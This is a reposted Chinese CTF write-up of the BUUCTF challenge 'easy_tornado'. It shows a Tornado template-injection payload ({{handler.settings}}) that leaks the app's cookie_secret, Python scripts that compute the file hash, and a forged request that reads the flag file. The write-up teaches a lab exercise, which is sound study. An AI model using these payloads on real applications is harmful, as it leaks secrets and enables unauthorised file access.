buuctf [护网杯 2018]easy_tornado

2021-03-06 11:01:18 阅读：303 来源： 互联网

标签：buuctf settings tornado filename secret cookie 护网杯模板 md5

tornado是python中的一个web应用框架。（Python Web 框架：Tornado）
拿到题目有三个文件
在这里插入图片描述

flag在/fllllllllllllag文件里

render是python中的一个渲染函数，渲染变量到模板中，即可以通过传递不同的参数形成不同的页面。
render函数介绍
 tornado模板self.render和模板变量传递

filehash=md5(cookie_secret+md5(filename))
现在filename=/fllllllllllllag，只需要知道cookie_secret的既能访问flag。

测试后发现还有一个error界面，格式为/error?msg=Error，怀疑存在服务端模板注入攻击（SSTI）
在这里插入图片描述
尝试 /error?msg={{datetime}}
在Tornado的前端页面模板中，datetime是指向python中datetime这个模块，Tornado提供了一些对象别名来快速访问对象，可以参考Tornado官方文档

在tornado模板中，存在一些可以访问的快速对象,这里用到的是handler.settings，handler 指向RequestHandler，而RequestHandler.settings又指向self.application.settings，所以handler.settings就指向RequestHandler.application.settings了，这里面就是我们的一些环境变量

RequestHandler.settings
An alias for self.application.settings.

通过模板注入方式我们可以构造payload获取cookie_secret

/error?msg={{handler.settings}}

在这里插入图片描述
根据获得的cookie_secret构造md5(cookie_secret+md5(filename))这样的py或者手动cmd5去加密

python3版本

import hashlib
hash = hashlib.md5()

filename='/fllllllllllllag'
cookie_secret="0567b8eb-21bc-4c25-861f-481b36239643"
hash.update(filename.encode('utf-8'))
s1=hash.hexdigest()
hash = hashlib.md5()
hash.update((cookie_secret+s1).encode('utf-8'))
print(hash.hexdigest())

python2.7版本

#!-*-coding:utf-8 -*-
import hashlib
def md5(s):
    md5 = hashlib.md5()
    md5.update(s)
    print(md5.hexdigest())
    return md5.hexdigest()
    
def filehash():
    filename = '/fllllllllllllag'
    cookie_secret = '0567b8eb-21bc-4c25-861f-481b36239643'
    print(cookie_secret + md5(filename))
    print(md5(cookie_secret + md5(filename)))
if __name__ == '__main__':
    filehash()

在这里插入图片描述
得到加密的结果:492179b3e422a5877b68f59e774ca1ec
filename拼接我们的flag文件/fllllllllllllag将加密的结果拼接在filehash的后面得到最终payload:

/file?filename=/fllllllllllllag&filehash=492179b3e422a5877b68f59e774ca1ec

在这里插入图片描述
参考学习:

https://blog.csdn.net/ljphilp/article/details/47103745

　　https://www.cnblogs.com/chrysanthemum/p/11716903.html

　　https://darkwing.moe/2019/10/30/护网杯2018-easy-tornado/

　　SSTI完全学习:https://blog.csdn.net/zz_Caleb/article/details/96480967
　　
　　https://www.jianshu.com/p/aef2ae0498df

　　https://www.cnblogs.com/20175211lyz/p/11425368.html

标签：buuctf,settings,tornado,filename,secret,cookie,护网杯,模板,md5
来源： https://blog.csdn.net/qq_36241198/article/details/114434637

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

ICode9

buuctf [护网杯 2018]easy_tornado